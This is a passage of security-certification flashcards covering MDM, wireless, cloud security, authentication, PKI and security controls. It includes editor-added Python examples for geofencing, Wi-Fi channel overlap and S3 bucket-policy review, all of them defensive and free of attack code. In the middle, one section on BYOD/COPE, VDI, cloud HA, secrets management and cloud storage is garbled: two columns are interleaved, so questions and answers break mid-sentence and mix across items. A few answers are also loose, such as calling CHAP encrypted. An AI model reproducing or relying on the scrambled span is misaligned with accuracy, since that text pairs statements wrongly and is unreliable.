A: DNSSEC adds public-key signatures to DNS records: each zone signs its records with its private key and publishes the public key, and a validating resolver checks the chain of signatures up to the root. That gives origin authentication and data integrity for DNS answers (not confidentiality), defeating cache poisoning.

Q: Describe the purpose of using a Jump Server in network security.
A: A jump server is a hardened host between the user's network and a secure zone; administrators connect to it (SSH, RDP, VPN or port forwarding) and from it reach the devices inside, so only one tightly controlled and logged path exists into the zone. Its compromise is a serious event, so it must be patched, monitored and restricted to administrators.

Q: Do Hardware Security Modules (HSMs) provide cryptographic hardware security?
A: Yes. An HSM is tamper-resistant hardware that generates, stores and backs up keys and performs cryptographic operations (with hardware acceleration) so that private keys never leave the device. Large environments use them for encryption, signing and key management.

Q: Define Unified Threat Management (UTM) in network security.
A: A UTM appliance combines URL filtering, content and malware inspection, a firewall, IDS/IPS and a VPN endpoint in one box. It is convenient for smaller environments, at the cost of a single device that can become a performance bottleneck and a single point of failure.

Q: How do Next-Generation Firewalls (NGFWs) differ from traditional firewalls?
A: A traditional firewall decides on layer 3 and 4 addresses and ports. An NGFW decodes every packet up to the application layer, identifies the application regardless of port, and applies application-specific policies and vulnerability signatures, so it can allow one web application while blocking another on the same port.

Q: Describe the function of Intrusion Detection Systems (IDS) in network security.
A: An IDS watches network traffic for known exploits, buffer-overflow attempts and other attack signatures or anomalies and raises an alarm or alert when it sees one. It detects but does not block; an IPS sits inline and can drop the traffic.

Q: How does Mobile Device Management (MDM) help in managing mobile devices?
A: MDM centrally manages company-owned and user-owned mobile devices: it enforces policies on apps, data, camera use and screen lock, controls access to corporate resources, and can locate or wipe a device, so compliance does not depend on each user.

Q: Define Mobile Application Management (MAM) in mobile device security.
A: MAM manages the applications rather than the whole device: it provisions, updates and removes apps, offers an enterprise app catalog, monitors app usage, and can remotely wipe an application's data while leaving the user's personal data untouched.

Q: Describe the purpose of SEAndroid in Android OS security.
A: SEAndroid (Security Enhancements for Android) brings SELinux mandatory access control to Android: policies isolate and sandbox apps, protect privileged system daemons, and limit what a compromised process can reach, enforced by the kernel rather than by the application.
Q: How does Geofencing enhance mobile device security?
A: Geofencing lets the MDM apply policy by location: the camera can be disabled inside the building, an application or an authentication can be allowed only while the device is on company premises, and a device that leaves a defined area can lose access.

Q: Do Third-Party App Stores pose security risks for mobile devices?
A: Yes. Apps from outside the platform's official store have not passed its vetting and may carry malware or leak data. MDM policy normally blocks third-party stores and sideloading on managed devices.

Q: Define Rooting/Jailbreaking in the context of mobile device security.
A: Rooting (Android) or jailbreaking (iOS) means gaining full administrative control of the device operating system, usually through an exploit or custom firmware. It lets the user install anything and bypass platform security controls, which also disables the protections MDM relies on, so managed devices are checked for it and blocked.

Q: Describe the function of Remote Wipe in mobile device security.
A: Remote wipe erases all data on a lost or stolen device on command from the MDM (or the user), returning it to factory state. It works only if the device still has connectivity, which is why it is paired with device encryption: the data stays protected even when the wipe command cannot be delivered.

Q: How does Full Device Encryption enhance mobile device security?
A: Full device encryption scrambles all storage on the device so the data is unreadable without the passcode or key, even if the storage chip is removed. The trade-off is that there is normally no recovery: forgetting the password (or losing the escrowed key where MDM keeps one) means losing the data.

Q: Define Unified Endpoint Management (UEM) and its role in mobile device security.
A: UEM extends MDM to every end-user device, mobile or not (phones, tablets, laptops, desktops), so one console sets policy, pushes configuration and monitors compliance across all of them.

Q: Describe the purpose of Context-Aware Authentication in mobile device security.
A: Context-aware authentication considers where the device is, whether it is paired with a known device or network, the time, and whether the behaviour matches the user's normal pattern, and then allows, denies or requires an additional factor based on that combination rather than on a password alone.

Q: How does Containerization help in managing mobile device security?
A: Containerization keeps enterprise apps and data in a separate, encrypted container on the device, isolated from personal apps and data. It limits data sharing between the two sides and makes offboarding simple: the container is wiped and the user's personal data is untouched.

Q: Do External Media pose security risks for mobile devices?
A: Yes. SD cards and USB drives let data leave the device without crossing the network, and can bring malware in; MDM can disable external storage on managed devices.

Q: Define USB On-The-Go (USB OTG) and its role in mobile device security.
A: USB OTG lets a mobile device act as a USB host, so it can read an external drive, keyboard or camera directly without a computer, or present itself as a storage device to another host. That makes copying data in or out trivial, so MDM policy often disables it.
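Worked example added by the editor, not part of the original flashcards, for the geofencing and context-aware authentication cards above: a circular geofence evaluated with the haversine formula, an MDM-style camera rule bound to it, and an access decision that combines location with other context signals into allow, step-up or deny. The site coordinates, the fence radius, the resource name and the risk weights are all assumptions for the example.

```python
import math
from dataclasses import dataclass

EARTH_RADIUS_M = 6_371_000.0


def haversine_m(lat1: float, lon1: float, lat2: float, lon2: float) -> float:
    """Great-circle distance in metres between two WGS-84 coordinates."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlambda = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlambda / 2) ** 2
    return 2 * EARTH_RADIUS_M * math.asin(math.sqrt(a))


@dataclass(frozen=True)
class Geofence:
    name: str
    lat: float
    lon: float
    radius_m: float

    def contains(self, lat: float, lon: float) -> bool:
        return haversine_m(self.lat, self.lon, lat, lon) <= self.radius_m


# Assumed fence around a secure floor; the coordinates are placeholders.
SECURE_SITE = Geofence("hq-secure-floor", 37.7749, -122.4194, 150.0)


@dataclass(frozen=True)
class Context:
    lat: float
    lon: float
    paired_device_present: bool     # e.g. the user's enrolled watch or laptop nearby
    hour_local: int
    failed_logins_last_hour: int


def camera_allowed(ctx: Context) -> bool:
    """MDM geofencing rule assumed for the example: no camera inside the fence."""
    return not SECURE_SITE.contains(ctx.lat, ctx.lon)


def access_decision(ctx: Context, resource: str) -> str:
    """Context-aware authentication: combine several signals into
    'allow', 'step-up' (require an extra factor) or 'deny'."""
    inside = SECURE_SITE.contains(ctx.lat, ctx.lon)
    if resource == "hr-payroll" and not inside:    # hypothetical on-site-only system
        return "deny"
    risk = 0
    if not inside:
        risk += 1
    if not ctx.paired_device_present:
        risk += 1
    if not 7 <= ctx.hour_local <= 20:
        risk += 1
    if ctx.failed_logins_last_hour >= 3:
        risk += 2
    if risk == 0:
        return "allow"
    return "step-up" if risk <= 2 else "deny"
```

The location signal comes from the device, which is why it is one input among several rather than the decision: a rooted device can report any coordinates it likes, and GPS accuracy indoors is often worse than the fence radius, so policies that matter should fail toward step-up rather than toward allow.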
Q: Describe the function of Geotagging/GPS Tagging in mobile device security.
A: Geotagging embeds GPS coordinates in the metadata of photos, videos and documents created on the device. Publishing such a file reveals where it was made, which exposes locations, routines and facilities; MDM can disable geotagging.

Q: How does Geolocation enhance mobile device security?
A: Geolocation (GPS, supplemented by Wi-Fi and cell-tower positioning) locates a device to within a few feet, which helps recover a lost or stolen device and supports geofencing. The same data is a privacy concern and can be misused, so it is governed by policy.

Q: Define SMS/MMS and its security implications in mobile devices.
A: SMS (Short Message Service) carries text; MMS (Multimedia Messaging Service) carries pictures, video and audio. Both are channels for data leakage and for phishing (smishing), and inbound messages can expose information on the lock screen; MDM can restrict or disable them.

Q: Describe the purpose of Recording Microphone in mobile device security.
A: The microphone lets the device record audio, which is useful but creates legal liability (consent-to-record laws differ by jurisdiction) and privacy risk in sensitive meetings; MDM can disable recording or restrict it by location.

Q: How does Camera Use pose security risks in mobile devices?
A: A camera can photograph whiteboards, screens and documents (espionage or careless leakage) and can be used inappropriately; MDM can disable the camera entirely or only inside a geofence.

Q: Do Push Notification Services enhance mobile device security?
A: Not by themselves. Push services deliver messages to the device without user action, which is useful for timely alerts, but they can also show sensitive content on a locked screen or be abused for unwanted messages. MDM controls which apps may push and what appears on the lock screen.

Q: Define Passwords and PINs in mobile device security.
A: Passwords and PINs are the basic screen-lock authentication on a mobile device. MDM enforces the policy (minimum length, alphanumeric passcodes, lockout after failed attempts) and handles recovery when a user is locked out.

Q: Describe the function of Biometrics in mobile device security.
A: Biometrics (fingerprint, face or iris) authenticate on a physical characteristic: convenient and hard to share, but unchangeable if compromised, and not every implementation is equally strong. MDM policy decides whether biometrics may unlock the device or individual apps.

Q: How does Mobile Packet Analysis help in network security?
A: Capturing and analysing wireless packets from a mobile device or laptop shows signal strength, interference, which networks and devices are present, and what traffic crosses the air. It is used for troubleshooting and for spotting rogue access points and unencrypted traffic.

Q: Define Channel Selection and Overlaps in network security.
A: Access points are configured on channels whose frequency ranges must not overlap with those of neighbouring access points; in the 2.4 GHz band only channels 1, 6 and 11 are fully non-overlapping. Overlap causes interference and retransmissions, reducing throughput and availability.
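Worked example added by the editor, not part of the original flashcards, for the channel selection card above: the arithmetic behind "only 1, 6 and 11 do not overlap" in the 2.4 GHz band, a check that reports interfering access-point pairs, and a greedy plan that picks the non-overlapping set. The access-point names and channel assignments are constructed; the channel centres and the 22 MHz width are the 802.11b figures.

```python
CHANNEL_WIDTH_MHZ = 22        # 802.11b DSSS channel; 802.11g/n OFDM uses 20 MHz


def center_frequency_mhz(channel: int) -> int:
    """2.4 GHz band: channels 1-13 are 5 MHz apart starting at 2412 MHz;
    channel 14 (Japan only) sits at 2484 MHz."""
    if 1 <= channel <= 13:
        return 2407 + 5 * channel
    if channel == 14:
        return 2484
    raise ValueError(f"not a 2.4 GHz channel: {channel}")


def channels_overlap(a: int, b: int, width: int = CHANNEL_WIDTH_MHZ) -> bool:
    """Two channels overlap when their centres are closer than one channel
    width; co-channel (a == b) counts as overlap too."""
    return abs(center_frequency_mhz(a) - center_frequency_mhz(b)) < width


def find_overlaps(access_points: dict) -> list:
    """Pairs of access points whose channels interfere. Input is
    {ap_name: channel}; only APs within radio range of each other matter, so
    in practice this is run per floor or building."""
    names = sorted(access_points)
    return [(x, y) for i, x in enumerate(names) for y in names[i + 1:]
            if channels_overlap(access_points[x], access_points[y])]


def non_overlapping_plan(max_channel: int = 11) -> list:
    """Greedy selection of mutually non-overlapping channels."""
    plan = []
    for channel in range(1, max_channel + 1):
        if all(not channels_overlap(channel, chosen) for chosen in plan):
            plan.append(channel)
    return plan
```

Co-channel neighbours (two APs both on channel 6) at least share the medium politely through carrier sensing; adjacent-channel overlap (channels 1 and 3) is worse, because each radio sees the other only as noise. That is why the plan spaces channels five apart rather than simply avoiding duplicates.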
Q: Describe the purpose of Access Point Placement in network security.
A: Place access points where the users are, with enough overlap for roaming but no more, and set transmit power so coverage does not spill far beyond the building. This minimises interference between access points and limits how far outside the premises the network can be attacked.

Q: Define Wireless Infrastructure Security and its importance.
A: Wireless infrastructure security protects the controllers and access points themselves: restrict access to the management console (a separate management network, strong authentication, HTTPS/SSH only), use strong encryption for clients, and keep firmware updated. A compromised access point sees all the traffic that crosses it.

Q: How do Mobile Networks like Wi-Fi and Cellular Networks operate in communication?
A: Wi-Fi connects a device to a local network through an access point; cellular networks connect it to the carrier's towers and from there to the Internet wherever there is coverage. Both raise the concerns of traffic monitoring by whoever runs the infrastructure and of location tracking from the connections themselves.

Q: Describe the function of Bluetooth in mobile communication.
A: Bluetooth provides short-range, high-speed links for Personal Area Networks: phones to headsets, smartwatches, cars and keyboards. Discoverable devices and weak pairing expose it to unauthorised connections and data access.

Q: Define RFID (Radio-frequency identification) and its applications.
A: RFID uses radio energy to read (and write) small tags: access badges, inventory and asset tracking, pet identification. Passive tags are powered by the reader's signal; active tags have a battery and longer range. Communication is bidirectional, and many tag types can be read or cloned by anyone with a reader.

Q: How does Near Field Communication (NFC) enhance wireless communication?
A: NFC builds on RFID for two-way communication at a range of a few centimetres: contactless payment, bootstrapping a Bluetooth pairing, and access tokens. The short range limits casual eavesdropping and the standard supports encryption, but range alone is not a security control.

Q: Describe the purpose of Infrared (IR) in mobile devices.
A: Infrared on a phone is mostly a line-of-sight remote control for entertainment systems; older devices also used it for file transfer. It is low bandwidth and requires line of sight, so its security impact is limited.

Q: Define USB (Universal Serial Bus) and its role in mobile device connectivity.
A: USB is the physical connection for charging and for data transfer to a computer or external device. Because it carries data, a connected host can pull data off the device or push malware onto it; MDM can restrict USB data transfer so the port is charge-only.

Q: How does Global Positioning System (GPS) enhance mobile device functionality?
A: GPS gives the device its longitude, latitude and altitude from satellite signals, enabling maps, directions and location-based features; it is also the source for geotagging and geofencing.

Q: Describe the function of Mobile Device Enforcement in ensuring security.
A: Mobile device enforcement is the MDM applying the rules: blocking third-party app stores and sideloading, detecting and blocking rooted or jailbroken devices, and controlling firmware and OS updates so that devices stay compliant.
Describe how geotagged information in Do WiFi Direct and ad hoc networks require
documents can be a security concern. access points?

Define BYOD and explain its security challenges. How does COPE differ from BYOD?

Describe VDI/VMI and its benefits. Define HA across zones in cloud computing.

How do resource policies contribute to cloud Explain the concept of secrets management in
security? cloud computing.

Describe the purpose of integration and auditing Define the term 'Cloud storage' and explain its
in cloud security. importance.
No, WiFi Direct and ad hoc networks allow Geotagged information in documents can allow
wireless devices to connect directly without the easy tracking of users, potentially leading to
need for access points. security risks.

COPE (Corporate Owned, Personally Enabled) BYOD stands for Bring Your Own
involves the company buying the device, Device/Technology, where employees use their
maintaining full control, and allowing both personal devices for work, posing security
corporate and personal use, unlike BYOD where challenges due to the mix of personal and work
the employee owns the device. data.

HA (High Availability) across zones involves VDI/VMI separates apps and data from mobile
isolating locations within a cloud region, running devices, stores data securely, minimizes risk of
applications in active/standby or active/active physical device loss, centralizes app
modes, and using load balancers for seamless development, and manages applications
availability. centrally.

Secrets management involves authorizing


Resource policies in cloud computing manage
access to sensitive data like API keys, passwords,
identity and access, map job functions to roles,
and certificates, limiting access to necessary
provide granular access policies, and centralize
users, and providing an audit trail for monitoring
user accounts for synchronized access.
access.

Integration and auditing in cloud security aim to


Cloud storage involves storing data on a public
integrate security measures across platforms,
cloud, ensuring limited and protected access,
consolidate log storage and reporting using
requiring backups, and maintaining availability
SIEM, and validate security controls through
as the cloud environment evolves.
auditing.
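Worked example added by the editor, not part of the original flashcards, for the cloud storage card above (limited, protected access) and the bucket-permissions card that follows it: a reviewer's check that classifies an S3-style bucket policy as public, private, or needing review. The policy documents, account number and resource names are constructed placeholders in the real policy format; the check itself is the kind of thing a configuration review or CSPM tool runs over every bucket.

```python
import json

# Constructed policy documents in the S3 bucket-policy format; the account
# number and resource names are placeholders.
PUBLIC_READ = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Principal": "*",
                   "Action": "s3:GetObject",
                   "Resource": "arn:aws:s3:::example-reports/*"}]})

ROLE_ONLY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow",
                   "Principal": {"AWS": "arn:aws:iam::123456789012:role/report-reader"},
                   "Action": ["s3:GetObject", "s3:ListBucket"],
                   "Resource": ["arn:aws:s3:::example-reports",
                                "arn:aws:s3:::example-reports/*"]}]})

STAR_WITH_CONDITION = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Principal": {"AWS": ["*"]},
                   "Action": "s3:GetObject",
                   "Resource": "arn:aws:s3:::example-reports/*",
                   "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-0123456789abcdef0"}}}]})

DENY_INSECURE_TRANSPORT = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Deny", "Principal": "*", "Action": "s3:*",
                   "Resource": "arn:aws:s3:::example-reports/*",
                   "Condition": {"Bool": {"aws:SecureTransport": "false"}}}]})


def _principal_is_everyone(principal) -> bool:
    """'*' or {"AWS": "*"} (possibly in a list) means any caller, anonymous included."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS", [])
        return "*" in (aws if isinstance(aws, list) else [aws])
    return False


def classify_policy(policy_json: str) -> str:
    """'public' if any Allow statement grants to everyone unconditionally,
    'review' if an everyone-grant is narrowed only by a Condition (some
    conditions still leave it effectively public), otherwise 'private'."""
    doc = json.loads(policy_json)
    statements = doc.get("Statement", [])
    if isinstance(statements, dict):          # a single statement may be a bare object
        statements = [statements]
    verdict = "private"
    for stmt in statements:
        if stmt.get("Effect") != "Allow" or not _principal_is_everyone(stmt.get("Principal")):
            continue
        if not stmt.get("Condition"):
            return "public"
        verdict = "review"
    return verdict
```

A Deny statement with Principal "*" is the opposite of a problem (the insecure-transport deny above is a common hardening rule), which is why the check looks at Effect before Principal. The policy is only one of several ways a bucket becomes public (ACLs and the account-level block setting are the others), so this check belongs alongside them, not instead of them.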
Q: How do permissions impact cloud storage security?
A: A single permission mistake on a storage bucket exposes it to the whole Internet, and many breaches have been exactly that. Deny public access by default, grant access through IAM and bucket policies to specific principals, and turn on the provider's account-wide block on public access as a backstop.

Q: Explain the concept of encryption in cloud computing.
A: Data in the cloud is protected at rest with server-side encryption (the provider encrypts it on its storage) or client-side encryption (the data is encrypted before it leaves the client, so the provider never holds the plaintext), and in transit with TLS. Key management is the critical part: whoever holds the keys can read the data.

Q: Describe the purpose of replication in cloud computing.
A: Replication copies data to multiple locations, often in real time, for disaster recovery and high availability. Copies also serve analytics workloads without touching production and act as continuous backups, although replication faithfully copies deletions and corruption too, so it does not replace point-in-time backups.

Q: Define cloud networks and their role in cloud computing.
A: Cloud networks connect cloud components to each other and to the outside world: users reach the application from the public Internet or over a VPN tunnel, and the cloud devices communicate with each other on internal virtual networks.

Q: Explain the concept of virtual networks in cloud computing.
A: A virtual network is built from the cloud console out of virtual servers, routers, switches and firewalls configured much like their physical counterparts, but it can be changed on demand and scales elastically with the application.

Q: Describe the importance of segmentation in cloud computing.
A: Segmentation separates VPCs, containers and microservices so that data and application tiers are isolated and a compromise of one does not reach the others. Virtualised security devices such as WAFs and NGFWs are placed at the boundaries between segments.

Q: Define API inspection and integration in cloud security.
A: In a microservice architecture almost everything is an API call, so security monitoring must watch those calls for unauthorised access attempts and abuse, and integrate that visibility with the rest of the security stack across platforms.

Q: Explain the role of compute cloud instances in cloud computing.
A: Compute instances are the IaaS building block: virtual machines or containers launched on demand, allocated resources according to load, and disabled or removed when no longer needed.

Q: Describe the function of security groups in cloud computing.
A: A security group is the firewall attached to a compute instance: it controls inbound and outbound traffic by layer 3 address (or CIDR range) and layer 4 protocol and port, and is default-deny with allow rules only.

Q: Define dynamic resource allocation in cloud computing.
A: Dynamic resource allocation provisions resources automatically as demand changes, watching metrics such as CPU utilisation to launch new application instances when load rises and to scale them down when it falls.
Q: Explain the concept of instance awareness in cloud security.
A: Instance awareness in cloud security involves identifying and managing specific data flows for each instance, defining and setting policies for data access, and implementing granular security controls.

Q: Describe the purpose of virtual private cloud endpoints in cloud computing.
A: Virtual private cloud endpoints in cloud computing serve as VPC gateway endpoints, allowing private cloud subnets to communicate with other cloud services securely without requiring internet connectivity.

Q: Explain the security concerns related to container security in cloud computing.
A: Container security in cloud computing involves addressing bugs, insufficient security controls, and misconfigurations by using container-specific operating systems, grouping containers based on sensitivity, and limiting intrusion scope.

Q: Define the role of Cloud Access Security Brokers (CASB) in cloud security.
A: CASBs help secure cloud environments by integrating security policies, providing visibility into app usage, ensuring compliance with regulations, preventing threats, and securing data transfers.

Q: Describe the purpose of Next-Gen Secure Web Gateways (SWG) in cloud security.
A: Next-Gen SWGs protect users and devices by examining application APIs, allowing or disallowing specific activities, providing instance-aware security, and differentiating between development and production instances.

Q: Explain the function of firewalls in the cloud and their benefits.
A: Firewalls in the cloud control traffic flows inside and outside the cloud, offer cost-effective security measures, enable segmentation between microservices, VMs, or VPCs, and operate at OSI layers 4 and 7.

Q: Define the concept of security controls in cloud computing.
A: Security controls in cloud computing include cloud-native controls integrated and supported by the cloud provider, as well as third-party solutions that extend policies and reporting capabilities across multiple cloud providers.

Q: Describe the role of Identity Providers (IdP) in authentication.
A: Identity Providers vouch for users' identities, manage a list of entities like users and devices, and are commonly used in Single Sign-On applications or authentication processes.

Q: Explain the concept of attributes in identity management.
A: Attributes are identifiers or properties of an entity used for identification, including personal attributes like name and email address, and other attributes like department name or job title.

Q: Define certificates and their role in digital security.
A: Certificates bind public keys with digital signatures, providing trust and security in digital communications, with digital certificates being used for encryption, digital signatures, and secure data exchange.
Q: Describe the purpose of tokens and cards in authentication.
A: Tokens and cards are used as authentication factors, with smart cards integrating with devices and USB tokens storing certificates for secure authentication.

Q: Explain the concept of SSH keys and their role in secure communication.
A: SSH keys are used in Secure Shell communication as an alternative to username and password, providing secure authentication through public/private key pairs.

Q: Define Password Authentication Protocol (PAP) and its security implications.
A: PAP is a basic authentication method used in legacy systems, transmitting passwords in clear text, making it a weak authentication scheme with non-encrypted password exchange.

Q: Describe the Challenge-Handshake Authentication Protocol (CHAP) and its benefits.
A: CHAP is an encrypted authentication protocol using a challenge-response mechanism to verify passwords, providing secure authentication without transmitting passwords in clear text.

Q: Explain the concept of Remote Authentication Dial-in User Service (RADIUS) and its applications.
A: RADIUS is a common AAA protocol used to centralize authentication for various devices like routers, switches, firewalls, and remote VPN access, supporting a wide range of platforms and devices.

Q: Define Kerberos and its role in network authentication.
A: Kerberos is a network authentication protocol enabling mutual authentication between clients and servers, protecting against on-path or replay attacks, and providing a trusted authentication mechanism.

Q: Describe the purpose of IEEE 802.1X in network access control.
A: IEEE 802.1X is a port-based Network Access Control protocol that restricts network access until authentication succeeds, often used in conjunction with EAP for secure network access.

Q: Explain the concept of federation in identity management.
A: Federation allows network access for partners, suppliers, and customers, providing Single Sign-On and trust relationships between organizations, requiring a trust relationship to establish secure access.

Q: Define Security Assertion Markup Language (SAML) and its role in authentication.
A: SAML is an open standard for authentication and authorization, enabling users to authenticate through a third party for access, commonly used for secure authentication in various applications.

Q: Describe the purpose of OAuth in authorization and access control.
A: OAuth is an authorization framework used to determine user access to resources, providing industry support for secure authorization between applications without handling authentication.
Q: Explain the concept of access control and its importance in security.
A: Access control involves enforcing policies to ensure only authorized rights are exercised, determining user permissions, and defining policies based on access control models and business requirements.

Q: Define Mandatory Access Control (MAC) and its security implications.
A: MAC limits operations on objects based on security clearance levels, assigning labels to objects for access control, and ensuring users cannot change security settings.

Q: Describe the benefits of Role-based Access Control (RBAC) in security.
A: RBAC assigns access based on user roles, providing implicit rights based on roles, and using groups to manage access, enhancing security by controlling user permissions.

Q: Explain the concept of Attribute-based Access Control (ABAC) and its advantages.
A: ABAC considers multiple parameters for access control, allowing access based on various criteria like resource information, IP address, time of day, and desired actions, providing context-aware authorization.

Q: Define Rule-based Access Control and its application in security.
A: Rule-based Access Control enforces access rules based on system-enforced conditions, determining access based on predefined rules associated with objects, and ensuring secure access control.

Q: Describe the role of File System Security in managing access to files.
A: File System Security involves controlling access to files through access control lists, user/group permissions, and centralized administration, ensuring secure encryption and decryption of files.

Q: Explain the concept of Conditional Access and its importance in modern workplaces.
A: Conditional Access applies access rules based on conditions like employee status, location, application type, and device, providing granular access control and enhancing security in dynamic work environments.

Q: Define Privileged Access Management (PAM) and its benefits.
A: PAM manages superuser access by storing privileged accounts in a digital vault, enabling centralized password management, automation, access control, and extensive tracking and auditing of privileged accounts.

Q: Describe the purpose of Public Key Infrastructure (PKI) in digital security.
A: PKI involves policies, procedures, and technologies for managing digital certificates, ensuring secure creation, distribution, and management of certificates, and establishing trust in digital communications.

Q: Explain the concept of Certificate Chaining and its significance in digital security.
A: Certificate Chaining establishes a chain of trust between the server and the root CA, listing all certificates between the SSL certificate and the root certificate, ensuring secure validation of certificates in digital communications.
Q: Define the role of OCSP stapling in certificate validation.
A: OCSP stapling provides scalability for OCSP checks by stapling the OCSP status into the SSL/TLS handshake, allowing the certificate holder to verify their own status and ensuring secure certificate validation.

Q: Describe the concept of Key Escrow and its implications in security.
A: Key Escrow involves a third party holding decryption keys for legitimate purposes, enabling access to encrypted data under controlled conditions, and ensuring secure key management and access control.

Q: Explain the concept of Pinning and its role in ensuring secure connections.
A: Pinning involves associating expected certificates or public keys with an application to verify server legitimacy, enabling secure connections by detecting unauthorized certificates or public keys.

Q: Define the concept of Certificate Revocation List (CRL) and its importance in digital security.
A: A CRL is a list of revoked certificates maintained by the CA, containing certificates that are no longer trusted, ensuring secure certificate management and preventing the use of compromised certificates.

Q: Describe how traceroute works.
A: Traceroute is a tool used to determine the route a packet takes to reach a destination by mapping the entire path, taking advantage of ICMP Time to Live Exceeded error messages.

Q: Do nslookup and dig serve the same purpose?
A: Both nslookup and dig are used to look up information from DNS servers, such as canonical names, IP addresses, and cache timers, but dig is considered more advanced and preferred over nslookup.

Q: Define Nmap.
A: Nmap is a network mapping tool used to find and learn more about network devices, perform port scans to identify open ports, discover the operating system without logging in, and identify available services on a device.

Q: How does ping work as a troubleshooting tool?
A: Ping is used to test reachability by determining round-trip time using ICMP, making it one of the primary troubleshooting tools to check if a host is reachable.

Q: Describe the three categories of security controls.
A: Managerial controls, Operational controls, Technical controls.

Q: What is the purpose of theHarvester tool?
A: theHarvester is used to gather OSINT (Open-Source Intelligence) by scraping information from search engines like Google or Bing to find associated IP addresses, people from LinkedIn, and PGP keys by email domain, and to perform DNS brute-force searches.
Q: Define preventive security controls and provide examples.
A: Controls that physically control access to prevent security incidents, e.g., door locks, security guards, firewalls.

Q: How does a detective security control differ from a preventive control?
A: Detective controls identify and record intrusion attempts but may not prevent access, while preventive controls physically control access to prevent incidents.

Q: What is the purpose of corrective security controls?
A: Corrective controls are designed to mitigate damage after a security incident, such as blocking an attacker or restoring from backups.

Q: Define deterrent security controls and give examples.
A: Deterrent controls discourage intrusion attempts without directly preventing access, e.g., warning signs, login banners.

Q: Describe compensating security controls and provide examples.
A: Compensating controls do not prevent attacks but restore systems using other means, e.g., re-imaging, hot sites.

Q: What is the purpose of physical security controls?
A: Physical controls like fences, locks, and mantraps provide real-world security for assets.

Q: How does GDPR give individuals control over their personal data?
A: GDPR allows individuals to decide where their personal data goes and provides the right to be forgotten.

Q: Define compliance in the context of security.
A: Compliance refers to meeting the standards of laws, policies, and regulations related to security.

Q: What is the purpose of the Payment Card Industry Data Security Standard (PCI DSS)?
A: PCI DSS is a standard for protecting credit card data, with objectives like maintaining a secure network and monitoring networks regularly.
